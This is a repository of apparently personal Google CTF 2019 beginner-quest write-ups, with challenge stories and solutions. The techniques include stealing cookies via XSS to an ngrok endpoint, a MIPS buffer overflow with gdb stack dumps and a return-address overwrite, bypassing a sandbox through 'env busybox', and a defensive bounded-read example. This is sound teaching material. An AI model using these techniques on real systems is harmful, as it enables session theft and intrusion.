├── 01-reversing-rand2
    ├── 01.zip
    ├── README.md
    ├── log.txt
    └── rand2
├── 02-misc-satellite
    ├── README.md
    ├── README.pdf
    ├── ctf2.zip
    └── init_sat
├── 03-reversing-family-computer
    ├── 03.zip
    ├── README.md
    ├── credentials.txt
    ├── extract-stream.ps1
    ├── file0.png
    └── note.txt
├── 04-web-gov-xss
    └── README.md
├── 05-pwn-buffer-overflow
    ├── 05.zip
    ├── README.md
    ├── bof
    ├── console.c
    ├── controlled-payload
    ├── flag
    ├── flag1
    ├── input-controlled.txt
    ├── input.txt
    └── segfault-payload
├── 06-sandbox-readme
    └── README.md
├── 07-reversing-emoji
    ├── .gitignore
    ├── 07.zip
    ├── README.md
    ├── __pycache__
    │   ├── crawl.cpython-36.pyc
    │   └── vm.cpython-36.pyc
    ├── ctf_crawl
    │   ├── ctf_crawl
    │   │   ├── __init__.py
    │   │   ├── __pycache__
    │   │   │   ├── __init__.cpython-36.pyc
    │   │   │   └── settings.cpython-36.pyc
    │   │   ├── items.py
    │   │   ├── middlewares.py
    │   │   ├── pipelines.py
    │   │   ├── settings.py
    │   │   └── spiders
    │   │   │   ├── __init__.py
    │   │   │   ├── __pycache__
    │   │   │       ├── __init__.cpython-36.pyc
    │   │   │       └── cat_images.cpython-36.pyc
    │   │   │   └── cat_images.py
    │   ├── images.zip
    │   ├── output.json
    │   └── scrapy.cfg
    ├── extract-palindroms.py
    ├── palindromes
    ├── palindromes.py
    ├── program
    ├── translated
    ├── vm.modified.py
    └── vm.py
├── 08-misc-drive-to-target
    ├── README.md
    └── drive.py
├── 09-web-cwo-xss
    └── README.md
├── 10-crypto-caulingo
    ├── 10.zip
    ├── README.md
    ├── decode.py
    ├── msg.txt
    └── project_dc.pdf
├── 11-hardware-gatelock
    ├── 11.zip
    ├── README.md
    ├── beginner
    │   ├── auth.sqlite
    │   ├── env_meta.txt
    │   ├── force_loaded.txt
    │   ├── ipban.txt
    │   ├── map.sqlite
    │   ├── map_meta.txt
    │   ├── mesecon_actionqueue
    │   ├── players.sqlite
    │   ├── schems
    │   │   └── challenge.mts
    │   └── world.mt
    └── challenge.tgz
├── 12-misc-promo
    ├── README.md
    └── screenshot.png
├── README.md
└── assets
    └── map.png


/01-reversing-rand2/01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/01.zip

--------------------------------------------------------------------------------
/01-reversing-rand2/README.md:
--------------------------------------------------------------------------------
# Description
## Invitation

You are a simple life form, exiled from your home planet and in search of a new place to call home. The ruling came fast. Your taste in music was deemed to be far too "out-there-man" for anyone to possibly associate with you anymore. You were given 60 revolutions of Xenon around Fir to leave and never return. Gather whatever possessions and leave. You find your parents' music collection, oddly in it is a golden disc labelled "Property of NASA, if lost please return to: EVNJAKL 1600 Amphitheatre Parkway Mountain View California." The music on the disc was uncovered a while back and was not very interesting. This weird language that said something about "Peace, love and rock and roll. Also we're having a really cool party tonight, so for whoever is out there, bring a friend and come along! Co-ordinates enclosed." On the back the words "Draft, do not distribute or load onto probe" written in big red letters. That could mean anything.

You'll go, since you have nowhere else to go. But you'll be careful. You well know to learn all you can about alien beings before making contact. They could be hostile, or listen to boring music. Time is slipping away fast, you race aboard the nearest ObarPool Spaceship. But you've never driven one... what next genius?

## Enter Space-Time Coordinates
Label: misc

Ok well done. The console is on. It's asking for coordinates. Beating heavily on the console yields little results, but the only time anything changes on your display is when you put in numbers.. So what numbers are you going to go for? You see the starship's logs, but is there a manual? Or should you just keep beating the console?


# Solution
The attachment is a zip file containing a `log.txt` file and a `rand2` program. Running `strings` on the binary shows the flag `CTF{welcome_to_googlectf}`.

--------------------------------------------------------------------------------
/01-reversing-rand2/log.txt:
--------------------------------------------------------------------------------
0: AC+79 3888{6652492084280_198129318435598}
1: Pliamas Sos{276116074108949_243544040631356}
2: Ophiuchus{11230026071572_273089684340955}
3: Pax Memor -ne4456 Hi Pro{21455190336714_219250247519817}
4: Camion Gyrin{235962764372832_269519420054142}

--------------------------------------------------------------------------------
/01-reversing-rand2/rand2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/rand2

--------------------------------------------------------------------------------
/02-misc-satellite/README.md:
--------------------------------------------------------------------------------
# Description
## Arrival & Reconnaissance

Having successfully figured out this "coordinate" problem. The ship lurches forward violently into space. This is one of the moments when you realize that some kind of thought or plan would have been good, but typically for you and how you found yourself in this situation, you didn't think too much before acting. Only the stars themselves know where you'll end up.

After what seems like an eternity, or at least one full season of "Xenon's Next Top Galactic Overlord" you arrive in a system of 9 planetary bodies, though one of them is exceptionally small. You nostalgically remember playing explodatoid with your friends and hunting down planets like this. But this small planet registers a hive of noise and activity on your ship's automated scanners. There's things there!
Billions upon trillions of things, moving around, flying, swimming, sliding, falling.

Of particular interest may be the insect-like creatures flying around this planet, uniformly. One has the words "Osmium Satellites" written on it. Maybe this is a starting point to get to know what's ahead of you.

## Satellite
Label: networking

Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me Captain Tim? Floating in your tin can there? Your tin can has a wire to ground control?

Find something to do that isn't staring at the Blue Planet.

# Solution
The attachment is again a zip file, which contains a `README.pdf` and an `init_sat` binary. Opening the PDF shows some text and a picture containing the word `osmium`.
Running the binary shows a prompt asking for a satellite name. Enter `osmium` and it presents 3 choices. Entering `a` will print some information including a link to a Google Doc `https://docs.google.com/document/d/14eYPluD_pi3824GAFanS29tWdTcKxP_XUxx7e303-3E`. The doc contains a single string `VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==`. The character set and the `==` padding at the end identify it as base64. Decoding the string gives us
```
Username: wireshark-rocks
Password: start-sniffing!
```

So now with Wireshark open, we enter `a` again and look at the traffic. The flag is in the text sent over the network: `CTF{4efcc72090af28fd33a2118985541f92e793477f}`

--------------------------------------------------------------------------------
/02-misc-satellite/README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/README.pdf

--------------------------------------------------------------------------------
/02-misc-satellite/ctf2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/ctf2.zip

--------------------------------------------------------------------------------
/02-misc-satellite/init_sat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/init_sat

--------------------------------------------------------------------------------
/03-reversing-family-computer/03.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/03.zip

--------------------------------------------------------------------------------
/03-reversing-family-computer/README.md:
--------------------------------------------------------------------------------
# Description
## Home Computer
Label: forensics

Blunderbussing your way through the decision making process, you figure that one is as good as the other and that further research into the importance of Work Life balance is of little interest to you. You're the decider after all.
You confidently use the credentials to access the "Home Computer."

Something called "desktop" presents itself, displaying a fascinating round and bumpy creature (much like yourself) labeled "cauliflower 4 work - GAN post." Your 40 hearts skip a beat. It looks somewhat like your neighbors on XiXaX3. ..Ah XiXaX3... You'd spend summers there at the beach, an awkward kid from ObarPool on a family vacation, yearning, but without nerve, to talk to those cool sophisticated locals.

So are these "Cauliflowers" earthlings? Not at all the unrelatable bipeds you imagined them to be. Will they be at the party? Hopefully SarahH has left some other work data on her home computer for you to learn more.

# Solution
This attachment is a zip file containing a `family.ntfs` and a `note.txt` file. Opening the `family.ntfs` file in something like 7zip shows the contents of a Windows filesystem. Most of the files are empty, but if we navigate to `Users/Family/Documents` there is a file called `credentials.txt`. Opening the text file shows `I keep pictures of my credentials in extended attributes.`. Searching for NTFS extended attributes did not give much information, but I knew there was something called `alternate data streams`, so maybe it meant those. Checking the data streams was easy with PowerShell
```powershell
Get-Item credentials.txt -stream *
```
With that command, we can see that there is in fact another stream called `FILE0`. We can then extract the stream contents into a .png file, which reveals the flag `CTF{congratsyoufoundmycreds}`

The script `extract-stream.ps1` will extract the image from the file.

--------------------------------------------------------------------------------
/03-reversing-family-computer/credentials.txt:
--------------------------------------------------------------------------------
I keep pictures of my credentials in extended attributes.

--------------------------------------------------------------------------------
/03-reversing-family-computer/extract-stream.ps1:
--------------------------------------------------------------------------------
# List every data stream attached to the file (the default :$DATA plus any alternate streams)
Get-Item credentials.txt -stream *
# Read the alternate stream FILE0 as raw bytes.
# -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 6+ uses -AsByteStream instead.
$file = Get-Content credentials.txt -stream 'FILE0' -Encoding Byte -ReadCount 0
# Write the bytes back out unchanged as a PNG
Set-Content 'file0.png' -Encoding Byte -Value $file

--------------------------------------------------------------------------------
/03-reversing-family-computer/file0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/file0.png

--------------------------------------------------------------------------------
/03-reversing-family-computer/note.txt:
--------------------------------------------------------------------------------
If you're on MacOS, you can rename .ntfs to .dmg

--------------------------------------------------------------------------------
/04-web-gov-xss/README.md:
--------------------------------------------------------------------------------
# Description
## Government Agriculture Network
Label: web

Well it seems someone can't keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said "Loose Zips sink large commercial properties with a responsibility to the shareholders." You wonder if there is a similar concept here.

Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child.

The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you're meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity.

You need to get in closer to save them - you beat on the window, but you need access to the cauliflower's host to rescue it.

# Solution
This one just links to a site `https://govagriculture.web.ctfcompetition.com`. The site contains 2 images and an input with a submit button to create a post. There is also an admin link in the top nav bar. Clicking the admin link led to `https://govagriculture.web.ctfcompetition.com/admin` but redirected back to the main page. Clicking the submit button did a POST to `https://govagriculture.web.ctfcompetition.com/post` with a response page that just said `Your post was submitted for review. Administator will take a look shortly. `. Nothing else happens afterwards. I was stuck on this for a while as I had no idea what to do, since the submit and admin links did not appear to do anything. As the name of the task implies, an XSS exploit is used somehow, but I couldn't figure out how. After spending a lot of time clicking around, I saw a hint that creating a post would get a fake 'admin' on the server to view the post. Without that hint I would have wasted a lot more time.

So now with that hint, I assumed that I would have to use XSS to grab the cookies when the admin viewed the page and then send them back somehow. Unsure if my ISP even let me expose a web server, I set up a tunnel using `ngrok`. All I did was run `ngrok http 80`, and I did not even need to set up a server since all I needed was a way to see the data.
After setting that up, I entered this script as the post contents
```js

```
The idea is that the cookies would be encoded and sent to the endpoint through a request when the image tries to load.

After hitting submit, I looked in the dashboard and saw that indeed a request had been made to the URL along with the cookies as a query parameter. A quick decode and we have our flag `CTF{8aaa2f34b392b415601804c2f5f0f24e}`

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/05.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/05.zip

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/README.md:
--------------------------------------------------------------------------------
# Description
## STOP GAN
Label: pwn

Success, you've gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two separate things, you think you've rescued them and their brethren by downloading them all to your ship's hard drive. They're still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It's important now to stop this program from destroying these "Cauliflowers" as they're referred to, ever again.

# Solution
This attachment is a zip file containing a `bof` binary and a `console.c` source file. The description for the task also includes the text `buffer-overflow.ctfcompetition.com 1337`. Looking at the source file, we see that the binary `bof` is run using qemu and then we have to send input into that program and cause it to crash. There is also a bonus flag if we can cause a controlled crash.
To test locally I just ran `qemu-mipsel bof`, which runs the program and shows the prompt `Cauliflower systems never crash >>`. Entering text into the prompt just closes it. Since the goal was to use a buffer overflow, I decided to just input a lot of text into the program, and with a long enough input a segfault is created. Now all we have to do is try it on the actual program. So we connect to the server provided in the task with `nc buffer-overflow.ctfcompetition.com 1337`, enter `run`, then enter our long string of input. After a successful crash, it prints out the flag `CTF{Why_does_cauliflower_threaten_us}`

Since there is another flag, I decided to take a look at decompiling the `bof` binary. For this I used Ghidra. Since I don't have much experience with this, it was quite difficult to figure out everything, but after playing around with it for a while, this is what I figured out about what the program looks like
```c
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void segfault_handler(int sig);
void print_file(char *filename);

int main(void)
{
    void (*prevHandler)(int);
    int returnVal;
    char buffer[260];

    prevHandler = signal(SIGSEGV, segfault_handler);
    if (prevHandler == SIG_ERR) {
        printf("An error occurred setting a signal handler.");
        returnVal = -1;
    } else {
        puts("Cauliflower systems never crash >>");
        scanf("%s", buffer); /* no field width: input longer than the buffer overflows it */
        returnVal = 0;
    }
    return returnVal;
}

/* Installed for SIGSEGV: any crash prints the first flag. */
void segfault_handler(int sig)
{
    (void)sig;
    printf("segfault detected! ***CRASH***");
    print_file("flag");
    exit(0);
}

/* Copies the named file to stdout one byte at a time. */
void print_file(char *filename)
{
    int fileDescriptor;
    char buffer[4];
    int bytesRead;

    fileDescriptor = open(filename, O_RDONLY);
    if (fileDescriptor == -1) {
        puts("could not open flag");
        exit(1);
    }
    while ((bytesRead = read(fileDescriptor, &buffer, 1)) == 1) {
        write(STDOUT_FILENO, &buffer, 1);
    }
    close(fileDescriptor);
    return;
}
```

You can see that it does a `scanf` into a buffer of size 260. Therefore if we input something that is greater than `260 + 4 (frame pointer)` bytes, we should get a segfault because then we overwrite the return address. The `segfault-payload` file contains the data for causing a segfault.

```
Stack
+---------------------------+ High
|Previous frame             |
|                           |
+---------------------------+
|Return address             |
+---------------------------+
|Buffer                     |
|                           |
|                           |
|                           |
|                           |
+---------------------------+
|return value               |
+---------------------------+
|signal_handler             |
+---------------------------+ Low
```

Notice that there is no sign of the hidden flag in the decompiled code. That is because Ghidra removed an unreachable block. If we look at the assembly instead, we can see the hidden block.
```mips
004009bc 60 1f 11 04     bal scanf                                ;call scanf()
004009c0 00 00 00 00     _nop                                     ;branch delay slot
004009c4 10 00 dc 8f     lw gp,0x10(s8)                           ;??
004009c8 18 00 c2 8f     lw returnVal,0x18(s8)                    ;load word into returnVal
004009cc 07 00 40 14     bne returnVal,zero,setNormalReturnValue  ;this jump skips over the get hidden flag section
004009d0 00 00 00 00     _nop
getHiddenFlag
004009d4 30 80 82 8f     lw returnVal,-0x7fd0(gp)
004009d8 40 08 42 24     addiu returnVal,returnVal,0x840
004009dc 25 c8 40 00     or t9,returnVal,zero
004009e0 97 ff 11 04     bal local_flag                           ;local_flag()
004009e4 00 00 00 00     _nop                                     ;branch delay slot
004009e8 10 00 dc 8f     lw gp,0x10(s8)
setNormalReturnValue
004009ec 25 10 00 00     or returnVal,zero,zero
exit
004009f0 25 e8 c0 03     or sp,s8,zero
004009f4 24 01 bf 8f     lw ra,0x124(sp)
004009f8 20 01 be 8f     lw s8,0x120(sp)
004009fc 28 01 bd 27     addiu sp,sp,0x128
00400a00 08 00 e0 03     jr ra
00400a04 00 00 00 00     _nop
```

And this is the function that prints the local flag
```c
void local_flag(void)
{
    print_file("flag1");
    exit(0);
}
```

To get a better picture of what is happening, I used qemu with the gdb debugger to step through and examine the stack frame.
```
> qemu-mipsel-static -g 5555 bof
> gdb-multiarch
> (gdb) target remote localhost:5555
```

We can then set a breakpoint after `scanf`
```
> (gdb) b *0x004009c4
```

Then print out information.
Here was the information from the gdb session
```
(gdb) i frame
Stack level 0, frame at 0x7fffd8f0:
 pc = 0x4009c4 in main; saved pc = 0x400840
 Arglist at 0x7fffd8f0, args:
 Locals at 0x7fffd8f0, Previous frame's sp is 0x7fffd8f0
 Saved registers:
  gp at 0x7fffd7d8, s8 at 0x7fffd8e8, ra at 0x7fffd8ec, pc at 0x7fffd8ec
(gdb) x/100xw $sp
0x7fffd7c8: 0x00000060 0x7fffd7e4 0x00000001 0x00000000
0x7fffd7d8: 0x004a8970 0x00000000 0x00000001 0xaaaaaaaa
0x7fffd7e8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd7f8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd808: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd818: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd828: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd838: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd848: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd858: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd868: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd878: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd888: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd898: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd8a8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd8b8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd8c8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd8d8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
0x7fffd8e8: 0xaaaaaaaa 0x00400840 <-- return address
```

From here I tried overwriting the return address to point to the `read_local` function. Writing to the start of the function `0x00400840` successfully jumped to the function, but when it entered the `print_file` subroutine it crashed. Still not sure about why this happens.
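
In the gdb dump above, the input fill starts at `0x7fffd7e4` and the saved `ra` sits at `0x7fffd8ec`. The following added example, which is not part of the original repo, computes that distance and shows a bounded replacement for the `scanf("%s", ...)` call that rejects anything that would not fit in the 260-byte buffer; the function names are hypothetical and the test input is constructed.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BOF_BUF_SIZE 260u /* buffer[260] in the decompiled main() */

/* Bytes from the first input byte to the saved-ra slot, from gdb's addresses. */
static size_t saved_ra_offset(uintptr_t input_start, uintptr_t ra_slot)
{
    return (size_t)(ra_slot - input_start);
}

/*
 * Bounded stand-in for scanf("%s", buffer): reads one whitespace-delimited
 * token and never writes more than cap bytes, including the terminating NUL.
 * Returns the number of bytes stored, or -1 if there was no token or the
 * token did not fit (in which case buf is left empty).
 */
static int read_token_bounded(FILE *in, char *buf, size_t cap)
{
    int c;
    size_t n = 0;

    if (cap == 0)
        return -1;
    buf[0] = '\0';

    do {                        /* skip leading whitespace, as %s does */
        c = fgetc(in);
    } while (c != EOF && isspace(c));
    if (c == EOF)
        return -1;

    while (c != EOF && !isspace(c)) {
        if (n + 1 >= cap) {     /* no room for this byte plus the NUL */
            while (c != EOF && !isspace(c))
                c = fgetc(in);  /* drain the rest so it is not read later */
            buf[0] = '\0';
            return -1;
        }
        buf[n++] = (char)c;
        c = fgetc(in);
    }
    buf[n] = '\0';
    return (int)n;
}

/* Feed a constructed input of `len` filler bytes through the bounded reader. */
static int try_input_len(size_t len)
{
    char input[512];
    char buf[BOF_BUF_SIZE];
    FILE *in;
    int stored;

    if (len == 0 || len > sizeof input)
        return -1;
    memset(input, 'A', len);

    in = tmpfile();             /* stands in for stdin */
    if (in == NULL)
        return -1;
    fwrite(input, 1, len, in);
    rewind(in);
    stored = read_token_bounded(in, buf, sizeof buf);
    fclose(in);
    return stored;
}

int main(void)
{
    size_t off = saved_ra_offset(0x7fffd7e4u, 0x7fffd8ecu);

    printf("saved ra is %zu bytes past the start of the input\n", off);
    printf("%zu-byte input -> %d\n", off + 4, try_input_len(off + 4));
    printf("259-byte input -> %d\n", try_input_len(259));
    return 0;
}
```

The computed distance of 264 bytes matches the `260 + 4` figure given earlier in this README.
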
Instead, I skipped over some of the setup in the function and jumped to the address `0x00400860`, which is where the stack is being set up for the call into `print_file`. This worked, as the flag `CTF{controlled_crash_causes_conditional_correspondence}` was printed out.

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/bof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/bof

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/console.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/**
 * 6e: bufferflow triggering segfault - binary, compile with:
 * gcc /tmp/console.c -o /tmp/console -static -s
 *
 * Console allows the player to get info on the binary.
 * Crashing bof will trigger the 1st flag.
 * Controlling the buffer overflow in bof will trigger the 2nd flag.
 */

int main() {
    /* Unbuffered I/O so prompts reach the network client immediately */
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    char inputs[256];
    printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
    while(1) {
        printf("\nConsole commands: \nrun\nquit\n>>");
        /* fgets is bounded by the buffer size, so the console itself does not overflow */
        if (fgets(inputs, 256, stdin) == NULL) {
            exit(0);
        }
        printf("Inputs: %s", inputs);
        if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
            /* The vulnerable MIPS binary runs under user-mode qemu */
            int result = system("/usr/bin/qemu-mipsel-static ./bof");
            continue;
        } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
            exit(0);
        } else {
            puts("Unable to determine action from your input");
            exit(0);
        }
    }
    return 0;
}

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/controlled-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/controlled-payload

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag:
--------------------------------------------------------------------------------
{flag}

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag1:
--------------------------------------------------------------------------------
{flag1}

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input-controlled.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input-controlled.txt

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input.txt

--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/segfault-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/segfault-payload

--------------------------------------------------------------------------------
/06-sandbox-readme/README.md:
--------------------------------------------------------------------------------
# Description
## Work Computer
Label: sandbox

With the confidence of conviction and decision making skills that made you a contender for Xenon's Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is "Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?" You always were one for the trivialities of things.

Also presented is an image of a fascinating round and bumpy creature, labeled "Cauliflower for cWo" - are "Cauliflowers" earthlings? Your 40 hearts skip a beat - these are not the strange unrelatable bipeds you imagined earthlings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party?

SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower.
That is, *if* they can learn to navigate such things.

# Solution
This task only provides the address `readme.ctfcompetition.com 1337`. When connected, we are presented with a shell. Typing `help` shows
```
> help
Alien's shell
Type program names and arguments, and hit enter.
The following are built in:
  cd
  help
  exit
Use the man command for information on other programs.
```
Trying something like `ls` shows us two items, `ORME.flag` and `README.flag`, so it seems like there might be two flags. Trying to execute files shows `permission denied`. Let's see what programs are available.
```
> ls /bin
arch
busybox
chgrp
chown
conspy
date
df
dmesg
dnsdomainname
dumpkmap
echo
false
fdflush
fsync
getopt
hostname
ionice
iostat
ipcalc
kill
login
ls
lzop
makemime
mkdir
mknod
mktemp
mount
mountpoint
mpstat
netstat
nice
pidof
ping
ping6
pipe_progress
printenv
ps
pwd
reformime
rm
rmdir
run-parts
setpriv
setserial
shell
sleep
stat
stty
sync
tar
true
umount
uname
usleep
watch
```

I'm not too familiar with all the tools, but one of them probably allows us to access the file. Going down the list, I saw `busybox`, which seems promising. However, running busybox shows the message `busybox can not be called for alien reasons.` So it seems that this may be our target.

Running `ls -l`, the `README.flag` file is readable, but tools like `cat` or `tail` did not exist. So I went down the list for a tool that could possibly read files. Something I learned about was the `makemime` tool, because after reading up on it, it appears to be able to read a file.
Running `makemime README.flag` gives us:
```
> makemime README.flag
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="245967688-281105878-1932398038"

--245967688-281105878-1932398038
Content-Type: application/octet-stream; charset=us-ascii
Content-Disposition: inline; filename="README.flag"
Content-Transfer-Encoding: base64

Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==
--245967688-281105878-1932398038--
```

That string `Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==` looks like base64, and indeed decoding it gives us `CTF{4ll_D474_5h4ll_B3_Fr33}`. Now trying it for the other flag just left a blank screen, so it was back to figuring out how to open busybox. At least that was the only thing I could think of. We also have to get permissions to access the file. I found a hint for this one, which is the `env` command. The `env` command is able to execute a program, and running `env busybox` worked.
Now all I had to do was chmod and add read permissions
```
> env busybox chmod +r ORME.flag
> makemime ORME.flag
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="790050884-595716176-916811417"

--790050884-595716176-916811417
Content-Type: application/octet-stream; charset=us-ascii
Content-Disposition: inline; filename="ORME.flag"
Content-Transfer-Encoding: base64

Q1RGe1RoM3IzXzFzXzRsdzR5NV80TjA3aDNyX1c0eX0K
--790050884-595716176-916811417--
```

Another base64 decode and we get the flag `CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}`

--------------------------------------------------------------------------------
/07-reversing-emoji/.gitignore:
--------------------------------------------------------------------------------
primes*.txt

--------------------------------------------------------------------------------
/07-reversing-emoji/07.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/07.zip

--------------------------------------------------------------------------------
/07-reversing-emoji/README.md:
--------------------------------------------------------------------------------
# Description
## FriendSpaceBookPlusAllAccessRedPremium.com
Label: reversing

Having snooped around like the expert spy you were never trained to be, you found something that takes your interest: "Cookie/www.FriendSpaceBookPlusAllAccessRedPremium.com" But unbeknownst to you, it was only the 700nm Wavelength herring rather than a delicious cookie that you could have found. It looks exactly like a credential for another system. You find yourself in search of a friendly book to read.

Having already spent some time trying to find a way to gain more intelligence...
and learn about those fluffy creatures, you (several)-momentarily divert your attention here. It's a place of all the individuals in the world sharing large amounts of data with one another. Strangely enough, all of the inhabitants seem to speak using this weird pictorial language. And there is hot disagreement over what the meaning of an eggplant is.

But not much Cauliflower here. They must be very private creatures. SarahH has left open some proprietary tools, surely running this will take you to them. Decipher this language and move forth!

# Solution
The attachment is a zip containing a `program` file and a `vm.py` file. Looking at the files, it appears that there is a stack-based virtual machine implemented in `vm.py` which runs emoji-based code located in `program`. If we just run the program with `python3 vm.py program`, it begins to print out a URL, but it seems to stop after a bit. I initially thought that I would have to translate the program to figure out what it does and try to fix it; however, after waiting a bit, the program prints out more of the URL. It seems that whatever the program is doing takes longer and longer to calculate the result. After waiting long enough we can guess the URL `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com`.

The website appears to be a collection of pictures of cats. Each page has a picture and a set of links, and each link leads to another page and so on. Using `scrapy`, I crawled all the links and downloaded all the images. Going through them, it doesn't look like any of the pictures have the flag in them, either in the image itself or in the binary. So maybe the guess is incorrect and there is still more in the URL.

Taking a look at the program again, it seems like there are 3 phases of `🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇` instructions. Looking at the operations map, these instructions are creating and pushing the values of the first register onto the stack.
Note that each block also ends with `🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋`, which loads a value into the second register. If we work backwards by searching for all the print instructions (🎤), we can see that they all have a `xor (🌓)` instruction before them. So the first assumption is that it is XORing each of the numbers on the stack and printing them out. Adding the line `print("{} ^ {}\n".format(b, a))` to the `xor` function in the VM prints out

```
106 ^ 2 h
119 ^ 3 t
113 ^ 5 t
119 ^ 7 p
49 ^ 11
74 ^ 101
172 ^ 131
